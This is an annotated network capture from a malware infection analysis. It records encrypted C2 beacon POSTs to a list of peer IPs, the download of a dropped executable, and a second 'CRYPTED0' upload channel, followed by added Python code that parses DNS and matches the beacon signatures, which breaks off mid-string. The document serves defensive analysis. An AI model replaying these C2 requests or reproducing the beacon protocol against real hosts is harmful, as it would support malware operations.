-----------details-internet traffic-------------------

// Try to reach 208.87.243.18 on 8080 (http-alt): the SYN is answered with RST/ACK, nothing accepts the connection
192.168.7.84    208.87.243.18   TCP  sbl > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
208.87.243.18   192.168.7.84    TCP  http-alt > sbl [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
// Wireshark prints the client's ephemeral source ports as service names (sbl, afrog, danf-ak2, socks, ...);
// those names mean nothing here. The fixed part is the peer side: http-alt = 8080.

// An HTTP POST to 74.207.237.170:8080
192.168.7.84    74.207.237.170:8080   HTTP  POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1

POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 74.207.237.170:8080
Content-Length: 347
Connection: Keep-Alive
Cache-Control: no-cache

......dU..ZP....Y.yy..|4$R.".....u...+T..1L.;I.n6v39.+.. DP.....O@xt,U..V|............c1..4~: R.E.........K.:+.....Z`.. y.....e.z...B.....^...bG..B.opBx0E\ .....B..N.]....g.^......59.L.l.M.....>q)..Q...\5..p...M..q... W-.*...u.P.\p......2.K..HM7..~Z?vX.p.W..0.m....A?.u....=|<.\.' .......5._7'..46..G\.o" ....}...E..K...2eE..,.U.=.C....KtU.... u..2.~@

// The frame carrying the 347-byte request body: IP total length 01 83 = 387 = 20 (IP) + 20 (TCP) + 347,
// source port 04 11 = 1041, destination port 1f 90 = 8080, TCP flags 0x18 = PSH,ACK. The middle of the
// dump was left out by the author.
0000  00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00  ...".... ..>>..E.
0010  01 83 00 3f 40 00 80 06 f8 bf c0 a8 07 54 4a cf  ...?@... .....TJ.
0020  ed aa 04 11 1f 90 5a 54 91 b8 89 da 8f 5b 50 18  ......ZT .....[P.
0030  42 30 27 30 00 00 2e d7 f7 a7 03 ea 64 55 cf d6  B0'0.... ....dU..
0040  5a 50 e9 81 b2 b6 59 09 79 79 e6 b8 7c 34 24 52  ZP....Y. yy..|4$R
0050  a3 22 06 a4 11 86 ac 75 e0 08 b3 2b 54 12 a4 31  .".....u ...+T..1
:
:
0130  70 18 57 c8 97 30 ac 6d 93 08 fb a2 41 3f aa 75  p.W..0.m ....A?.u
0140  c7 83 e7 af 3d 7c 3c ef 5c 05 27 83 1e 2e d1 9b  ....=|<. \.'.....
0150  88 df 35 1f 5f 37 27 f1 f9 34 36 0e b0 47 5c b7  ..5._7'. .46..G\.
0160  6f 22 20 16 cb e9 9c 7d 01 98 08 45 9f a5 4b bf  o" ....} ...E..K.
0170  d5 90 32 65 45 e4 e9 2c b0 55 1d 3d ca 43 e2 e8  ..2eE.., .U.=.C..
0180  d8 d5 4b 74 55 e1 f6 9e 8d 75 a1 92 32 1c 7e 40  ..KtU... .u..2.~@
0190  7c                                               |

// The reply is encrypted as well: a long binary body sent chunked (first chunk size f3b = 3899 bytes).
// The author cut the body down to the lines marked "snip".
Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 09:58:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding

f3b
.}.%..k..o.-..U...........C..8.C.0...o...E.d... snip
2U...`......p_| ]X.$...B..A.F....}.snip
.@C...4*j..|.\..%..xv-.....snip
.1..x.....2.....`3....3.1..7......M.k..r-5s.8P=snip
z.nT^MV..{+=3ym........Gj.3JV....x..xe{@.......snip
[.UK.un2.>.W`..{.9'+.7*f..v.................F.M.snip
v....[...M.O.......P2.....;..a\..^..Rv&..9P...xsnip
n..Z...fG..t...1.|...`Vsnip
...#^&5.[...K...!i}...}.44...@...Zp`.."....*...snip
%.(.....T .C.Md.#-.{q........G.&5+.N.,.R.....V>snip
.g.{1...d..+t....T.g$....#..bMQ.f.5x.....pM'"a.snip
: :snip :
.%......8{..6...J..$:?..E.+..C"...V'uZ1M..$Cy6}.1snip
3.!.i~..N.a..;^..+..a..[..J.~...7}....W...q.rR..n(."snip

// Try to reach 132.248.49.112 on 8080; refused (RST/ACK to the SYN)
192.168.7.84    132.248.49.112  TCP  afrog > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
132.248.49.112  192.168.7.84    TCP  http-alt > afrog [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

// At this point the data from the reply above has been written to the %Temp% folder:
FileName:  exp2.tmp.exe
Timestamp: 2012/12/15 18:58
Size:      122,880 bytes
MD5:       ce7474646297ed818bb8ed48f50c7e1e

// DNS traffic: reverse (PTR) lookups for two of the peer addresses
//   112.49.248.132.in-addr.arpa -> web.ecologia.unam.mx
//   77.65.130.113.in-addr.arpa  -> NXDOMAIN (authority SOA: ns.shinbiro.com / domain.shinbiro.com)
// Check whether the sample issues these itself or whether they come from the capture tool's name
// resolution before counting them as malware behaviour.

// query 0x35ea: PTR 112.49.248.132.in-addr.arpa
00000000  35 ea 01 00 00 01 00 00 00 00 00 00 03 31 31 32  5....... .....112
00000010  02 34 39 03 32 34 38 03 31 33 32 07 69 6e 2d 61  .49.248. 132.in-a
00000020  64 64 72 04 61 72 70 61 00 00 0c 00 01           ddr.arpa .....
// response: flags 81 80, one answer, name pointer c0 0c, TTL 1c 1f = 7199 s, PTR web.ecologia.unam.mx
00000000  35 ea 81 80 00 01 00 01 00 00 00 00 03 31 31 32  5....... .....112
00000010  02 34 39 03 32 34 38 03 31 33 32 07 69 6e 2d 61  .49.248. 132.in-a
00000020  64 64 72 04 61 72 70 61 00 00 0c 00 01 c0 0c 00  ddr.arpa ........
00000030  0c 00 01 00 00 1c 1f 00 16 03 77 65 62 08 65 63  ........ ..web.ec
00000040  6f 6c 6f 67 69 61 04 75 6e 61 6d 02 6d 78 00     ologia.u nam.mx.
// query 0xcb61: PTR 77.65.130.113.in-addr.arpa
0000002D  cb 61 01 00 00 01 00 00 00 00 00 00 02 37 37 02  .a...... .....77.
0000003D  36 35 03 31 33 30 03 31 31 33 07 69 6e 2d 61 64  65.130.1 13.in-ad
0000004D  64 72 04 61 72 70 61 00 00 0c 00 01              dr.arpa. ....
// response: flags 81 83 (RCODE 3 = NXDOMAIN), no answer; authority SOA for 65.130.113.in-addr.arpa
// (pointer c0 0f), MNAME ns.shinbiro.com, RNAME domain.shinbiro.com (c0 3b), TTL 07 07 = 1799 s
0000004F  cb 61 81 83 00 01 00 00 00 01 00 00 02 37 37 02  .a...... .....77.
0000005F  36 35 03 31 33 30 03 31 31 33 07 69 6e 2d 61 64  65.130.1 13.in-ad
0000006F  64 72 04 61 72 70 61 00 00 0c 00 01 c0 0f 00 06  dr.arpa. ........
0000007F  00 01 00 00 07 07 00 2e 02 6e 73 08 73 68 69 6e  ........ .ns.shin
0000008F  62 69 72 6f 03 63 6f 6d 00 06 64 6f 6d 61 69 6e  biro.com ..domain
0000009F  c0 3b 77 bf 64 79 00 00 2a 30 00 00 0e d8 00 12  .;w.dy.. *0......
000000AF  75 00 00 01 51 80                                u...Q.

// Another POST, to 203.113.98.131:80. This request is built differently from the peer beacons:
// HTTP/1.0, a different User-Agent, application/octet-stream, and a body that starts with the
// literal marker "CRYPTED0".
POST /asp/intro.php HTTP/1.0
Host: 203.113.98.131
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 257
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

CRYPTED0...DK.V..aa..c.....PI%.^D.|2.s;.p..T=....*.........MX.../......../.;(.dl7).c..).......Jk.rO..e....!].......w .....}..5.+..6.SD4.> t......K...M........\..G...7V/..5].....|.....#.....=.P*^k.....b3cm.8..6..O...T....$|.......yb.~#...k0.|........o...[JD.

HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 10:01:37 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 16

STATUS-IMPORT-OK
// The reply is 16 bytes of plaintext, exactly "STATUS-IMPORT-OK": a usable response signature.

// At this point the malware process exp2.tmp.exe was started.

---------------take 2---------------------

// The infected host resets its connection to 74.207.237.170:8080. The client port is danf-ak2 = 1041,
// the same source port (04 11) as the take-1 POST in the hex dump above.
192.168.7.84    74.207.237.170  TCP  danf-ak2 > http-alt [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

// Two ICMP "Time-to-live exceeded in transit" messages from 209.190.61.50: a router on the path reports
// that packets from the infected host expired before reaching their destination.
209.190.61.50   192.168.7.84    ICMP Time-to-live exceeded (Time to live exceeded in transit)
209.190.61.50   192.168.7.84    ICMP Time-to-live exceeded (Time to live exceeded in transit)

// Communication via HTTP/POST with 174.143.174.136:8080 (two exchanges)
// post:
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 174.143.174.136:8080
Content-Length: 408
Connection: Keep-Alive
Cache-Control: no-cache

.m......(...P..0.w.j."...V....s.x.....c.....FH..?.. .I.t..`....OA&../.?$..._J.. .....b...ws.'I..l..r........}....+`91.R..+..P.....7q..+Q...........-\g'G.6..l...rV..[.4S..K.5'!?...=.......S...2AkUh..S....b4..#....!.$. .+d;K..].>&....._g.w...i)..}.,.....f..YD.G.KI....9......rZ .~q.+......Sk.i...........t....!.m*......;..w."...[.' ..i...:..$..w.....X1gR+..U}b..U..../....(...K.FIAVR..4.....,...ujk...i....H..e

// reply:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 10:13:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165

..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5 .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK 2U...`......\z#W.2.Pp_..NU..

// post:
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 174.143.174.136:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache

........b,.B..k'..`.9...r...7)@.~..^..E..o....y..YP .o...*gp......y..w........QF..^...J.......oV)vs..0eh....H....h7.K%Q,.c..I.U~S...\..?....g...Re,...\.?<.]2~.kw..M..t._.?.z.M<...h.-..Q.W.......Dg.3.1.."{Tf..RKw..9".T.......-." ..f(X..8..._...3*~+.%..Y.FH...\..:../.!.1G.I9..........o).........6*dXm.|-....$.6.. ..........8.....TJ...U....4TX.IdJ|b.=.e....h.G.....A...>.pC6.......]t..C'..

// reply:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 10:13:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165

..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5 .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK 2U...`........X.'8...".~K..J.

// Try to establish a connection with 199.71.215.194 on 8080; refused
192.168.7.84    199.71.215.194  TCP  cognex-insight > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
199.71.215.194  192.168.7.84    TCP  http-alt > cognex-insight [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

// Communication via HTTP/POST with 210.56.23.100:8080
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 210.56.23.100:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache

./Pl$,........*|.`..9...R{...B.....A...#.H..K.=e.......(.np...nn..y...M a.........2S...S..{|?....A.k.......... ..Q#.g..~........S...\..?....g...Re,....s.I..]..,......@I.R..P.n....I;te.<&......-9.!......8j...R.......Y....*.D&..={pY.3.l".;......xn..g.N.....T..,>..rOJ!..D=.>.J.. .(q..... ..P&....m.u6.....?....#.).W.........z....(.FF V.R ...-v!..38s)ab|....bKU..$..S...O.....

// reply:
HTTP/1.1 200 OK
Server: nginx/1.0.11
Date: Sat, 15 Dec 2012 10:05:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165

..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5 .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK 2U...`.........c.M..A..9.....
// Try 132.248.49.112 on 8080 again; refused
192.168.7.84    132.248.49.112  TCP  rdrmshc > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
132.248.49.112  192.168.7.84    TCP  http-alt > rdrmshc [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

// Try 74.117.61.66 on 8080; refused
192.168.7.84    74.117.61.66    TCP  socks > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
74.117.61.66    192.168.7.84    TCP  http-alt > socks [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

// Try 173.192.229.36 on 8080; refused
192.168.7.84    173.192.229.36  TCP  mctp > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
173.192.229.36  192.168.7.84    TCP  http-alt > mctp [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

// Communication via HTTP/POST with 69.64.89.82:8080
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 69.64.89.82:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache

..[. 8.|. . ...+...n.^.7.Mh=..R......Y....I.r$.O.....j..g..7l.4p#&....H.G5..P-.........ld}.l[......xd&..? ....)...>))'D;vgQ.....S...\..?....g...Re,.O..j.~y....+..?.S......a..5.....L.%.3v......... .......g.Xf...f..0.i`f..].E~\Z..4.G.....Nn.b..~......Dw.N...S.iW.......oI...W....t.!Hp.#8h..uAK...4L......j....f...]./ .e...3k.o.b......T....[lm^8.X......l...."+9...2.v.\...GN..-....?.A".5wkR

// reply (note the server's own clock: 02:51, hours away from the other peers' Date headers):
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 02:51:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165

..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5 .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK 2U...`......O..z.zj....>..;..

// Try 173.224.221.135 on 8080; refused
192.168.7.84    173.224.221.135 TCP  ltp-deepspace > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
173.224.221.135 192.168.7.84    TCP  http-alt > ltp-deepspace [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

// Try 59.90.221.6 on 8080; refused
192.168.7.84    59.90.221.6     TCP  ardus-trns > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
59.90.221.6     192.168.7.84    TCP  http-alt > ardus-trns [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

// Try 180.235.150.72 on 8080; refused
192.168.7.84    180.235.150.72  TCP  sacred > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
180.235.150.72  192.168.7.84    TCP  http-alt > sacred [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

// Communication via HTTP/POST with 123.49.61.59:8080 (two exchanges)
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 123.49.61.59:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache

...:..'....F..oP.Ka.2U.d....N~9..|.....,.. ... 8....!'......Cr..,.8 ..F[....z.%_...p.L..........C':.rq.t...U..H..7.b.........I.IS...\..?....g...Re,..C...V..:...D.....W.3..jO...Sh`j.4.,....A.#..zcm.G.....D.6..4/.........s4\>..G.dh...........-........).%j...-mG..#W.......&d.....g.Y..(.w.Vs&.rj...uAV....>^1.J.J..4.....M...Rp..%..n.k.....wt....x........}.z`..d.:.$ ..9..:...;I\....G/.G....

// reply:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 10:29:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165

..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5 .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK 2U...`.......^...R.L&F..x....

// post:
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 123.49.61.59:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache

g..7...:R...g\.....F......@..8B..w...}.28..^....})u...ZR.exi.f......h..T..s..j..4..'m.E....SZ?.R@f. .l...(>..U.~N=;..Z......&...S...\..?....g...Re,.,.".+..y.&U..X.f...G7J.$ s ..7#?..3..b.UC.]....`.-.,.......v....C......F9'.&...Q.L..A..6+..N.Vx.......+.R..o.l...%.Q.qSR.W..IBpoy...Y. n..7b ..jW.qO.*.j.'..f)I_7. R...5.0AY7....m..X...>..\M.QN.p.r.P.&f......Y.0.'..!e..j.s.-w>.HwL..j.0..[.

// reply:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 10:30:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165

..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5 .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK 2U...`......,.&.3.."cz@..[.a.
// Communication via HTTP/POST with 123.49.61.59:8080
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 123.49.61.59:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache

.K.Vn%d...;.Q6K.vq..)...T...e.,....c.q.K..............-.....t:.Hy(.....K.....t.d.......L,..7...}%..h&...?..)..*.@....Hg...ys.$A.S...\..?....g...Re,....H1ij..b.KC.....DJ....y.C2.I.0....#.4 ...H...hi....~.T%5.M*v..z`..v....r..b....K.yQ...Se..5....Z2.r.+...H9..8.^A..>....".....]..&....\...`"/r...:e.mO..w.4..7...Q..!...Ll..(..I.M>x.\.Y>...ET...=.S.'.....(..( ...4Q.F.LN.......AI.&.*.w.u4..

// reply:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 10:29:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165

..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5 .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK 2U...`.........X)myU.>.^....J
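The two reverse-lookup exchanges dumped in take 1 (the 35ea and cb61 messages) can be decoded with a small RFC 1035 wire-format parser. This is an added example, not part of the original notes: the two response messages are transcribed from the hex on the page, while the parser, its function names (read_name, read_rr, parse_message) and its structure checks are this example's own. It follows the name-compression pointers seen in the dumps (c0 0c, c0 0f, c0 3b) and rejects pointers that do not point backwards, which is the usual trouble spot in hand-written DNS parsers.

```python
"""Decode the two PTR responses captured above (RFC 1035 wire format).

Added example, not code from the original notes. The two messages are transcribed
from the page's hex dumps; the parser itself is this example's own.
"""
import struct

TYPES = {1: "A", 2: "NS", 6: "SOA", 12: "PTR"}
RCODES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN"}

# Transcribed from the dump above: id 0x35ea, NOERROR, one PTR answer
PTR_OK = bytes.fromhex(
    "35ea81800001000100000000"                                    # id, flags, qd an ns ar
    "03313132023439033234380331333207696e2d61646472046172706100"  # 112.49.248.132.in-addr.arpa
    "000c0001"                                                    # QTYPE PTR, QCLASS IN
    "c00c000c000100001c1f0016"                                    # ptr->12, PTR, IN, TTL, RDLEN 22
    "037765620865636f6c6f67696104756e616d026d7800"                # web.ecologia.unam.mx
)
# Transcribed from the dump above: id 0xcb61, NXDOMAIN, SOA in the authority section
PTR_NX = bytes.fromhex(
    "cb6181830001000000010000"
    "023737023635033133300331313307696e2d61646472046172706100"    # 77.65.130.113.in-addr.arpa
    "000c0001"
    "c00f0006000100000707002e"                                    # ptr->15, SOA, IN, TTL, RDLEN 46
    "026e73087368696e6269726f03636f6d00"                          # MNAME ns.shinbiro.com
    "06646f6d61696ec03b"                                          # RNAME "domain" + ptr->59
    "77bf647900002a3000000ed80012750000015180"                    # serial refresh retry expire minimum
)


def read_name(msg, off):
    """Read a possibly-compressed name at `off`; return (name, offset after it).
    A pointer must point backwards, so no message can make this loop."""
    labels, end = [], None
    while True:
        length = msg[off]
        if (length & 0xC0) == 0xC0:                  # compression pointer
            target = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            if target >= off:
                raise ValueError("DNS pointer does not point backwards")
            if end is None:
                end = off + 2                        # resume here once the pointer is followed
            off = target
            continue
        if length > 63:
            raise ValueError("label longer than 63 bytes")
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (end if end is not None else off)


def read_rr(msg, off):
    """Parse one resource record; PTR and SOA RDATA are decoded, others kept raw."""
    name, off = read_name(msg, off)
    rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
    off += 10
    end = off + rdlen
    if end > len(msg):
        raise ValueError("RDLENGTH runs past the end of the message")
    if rtype == 12:
        rdata = {"ptr": read_name(msg, off)[0]}
    elif rtype == 6:
        mname, o = read_name(msg, off)
        rname, o = read_name(msg, o)
        serial, refresh, retry, expire, minimum = struct.unpack("!IIIII", msg[o:o + 20])
        rdata = dict(mname=mname, rname=rname, serial=serial, refresh=refresh,
                     retry=retry, expire=expire, minimum=minimum)
    else:
        rdata = {"raw": msg[off:end].hex()}
    return {"name": name, "type": TYPES.get(rtype, rtype), "class": rclass,
            "ttl": ttl, "rdata": rdata}, end


def parse_message(msg):
    """Parse header, question and the three record sections of a DNS message."""
    ident, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    off, questions = 12, []
    for _ in range(qd):
        qname, off = read_name(msg, off)
        qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        questions.append((qname, TYPES.get(qtype, qtype)))
    result = {"id": ident, "response": bool(flags & 0x8000),
              "rcode": RCODES.get(flags & 0xF, flags & 0xF), "questions": questions}
    for section, count in (("answer", an), ("authority", ns), ("additional", ar)):
        records = []
        for _ in range(count):
            rr, off = read_rr(msg, off)
            records.append(rr)
        result[section] = records
    if off != len(msg):
        raise ValueError("trailing bytes after the last record")
    return result


if __name__ == "__main__":
    for raw in (PTR_OK, PTR_NX):
        print(parse_message(raw))
```

The trailing-bytes and RDLENGTH checks are what turn a decoder into something you can point at hostile traffic: a message that claims more records than it carries, or an RDATA that runs off the end, is rejected instead of being read as whatever follows in the buffer.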
// Try 113.130.65.77 on 8080; refused
192.168.7.84    113.130.65.77   TCP  hpvmmcontrol > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
113.130.65.77   192.168.7.84    TCP  http-alt > hpvmmcontrol [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

// Try 180.235.150.72 on 8080 again; refused (these two lines kept Wireshark's frame number and capture time)
802 795.966247  192.168.7.84    180.235.150.72  TCP  saphostctrls > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
803 796.070637  180.235.150.72  192.168.7.84    TCP  http-alt > saphostctrls [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

// Communication via HTTP/POST with 69.64.89.82:8080
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 69.64.89.82:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache

.X...j.K.!L.C..............3.8.|...........w..9...W .K.Q....se.....k....y.;..6=$..%%.O....k'....iu|......=.?u..]%....?../...\...S...\..?....g...Re,.]...n.G.j..0O.X.rQ l...[.h.........-.zR..J\...".Q w..Yv..}:n..R.....6z.S0......_+.sXx....3n!.w..]k.o...d;^......b...8.h8.g.a...C.|C...m...4.M..[ .T..3!k..T.U=1N.~d.c..C.m.... ..}..&..y_5..u ..Z...Z4;.u@..|A..&..G|}._.\.L.....A....u..|`..'.

// reply:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 02:55:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165

..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5 .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK 2U...`......]...v.T.v..%s.\.$

-----------------------------internet data ends--------------------

// What the capture shows, in short:
// - Infected host 192.168.7.84. Dropped binary: %Temp%\exp2.tmp.exe, 122,880 bytes,
//   MD5 ce7474646297ed818bb8ed48f50c7e1e, written after the chunked reply from 74.207.237.170:8080.
// - The host walks a list of peers on TCP/8080. Refused (RST/ACK to the SYN): 208.87.243.18, 132.248.49.112,
//   199.71.215.194, 74.117.61.66, 173.192.229.36, 173.224.221.135, 59.90.221.6, 180.235.150.72, 113.130.65.77.
//   Answering POSTs on 8080: 74.207.237.170, 174.143.174.136, 210.56.23.100, 69.64.89.82, 123.49.61.59.
// - Every peer POST uses the same URI /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/, the same User-Agent
//   "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)", Connection: Keep-Alive, Cache-Control: no-cache
//   and an encrypted body of 347, 387 or 408 bytes. Every answering peer reports nginx/1.0.10 or 1.0.11 with
//   PHP/5.3.18-1~dotdeb.0 and returns a 165-byte encrypted reply.
// - Those 165-byte replies are identical across different peers and times except for the final few bytes, and
//   the 387-byte requests all carry the fragment S...\..?....g...Re, at about the same offset. Constant
//   ciphertext for what must be constant plaintext at a fixed position points to a static key with no
//   per-message IV; the constant bytes, the URI and the User-Agent are all usable network signatures.
// - Second channel: POST /asp/intro.php HTTP/1.0 to 203.113.98.131:80, body prefixed with the literal
//   CRYPTED0, acknowledged with the 16-byte plaintext STATUS-IMPORT-OK.
// - The Date headers are the remote servers' own clocks (02:51, 09:58, 10:13, 10:29 within one run) and do not
//   order events; use the capture timestamps for that.
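As an added example (not part of the original notes), the following Python triages the two kinds of traffic recorded above from Wireshark summary lines and raw HTTP requests: it separates peers that refused the SYN from those that took a POST, and it matches the two request shapes by their fixed parts (the URI and User-Agent on 8080; /asp/intro.php with the CRYPTED0 body prefix). The summary lines and request headers are transcribed from the capture; the encrypted bodies are replaced by constructed placeholder bytes of the declared length, and the function names (peer_status, parse_request, classify, triage) are this example's own.

```python
"""Triage of the peer/C2 traffic recorded in the notes above.

Added example, not code from the original notes. Summary lines and headers are
transcribed from the capture; bodies are constructed placeholders; the logic is ours.
"""
import re

INFECTED_HOST = "192.168.7.84"
BEACON_PATH = "/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/"          # fixed URI of every peer POST
BEACON_UA = "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"
UPLOAD_PATH = "/asp/intro.php"
UPLOAD_MARKER = b"CRYPTED0"                              # literal body prefix of the second channel
SERVICE_PORTS = {"http": 80, "http-alt": 8080}           # Wireshark's resolved service names

# Wireshark one-line summaries from the capture (two of them carry a frame number and time)
SUMMARY_LINES = """\
192.168.7.84 208.87.243.18 TCP sbl > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
208.87.243.18 192.168.7.84 TCP http-alt > sbl [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
192.168.7.84 199.71.215.194 TCP cognex-insight > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
199.71.215.194 192.168.7.84 TCP http-alt > cognex-insight [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
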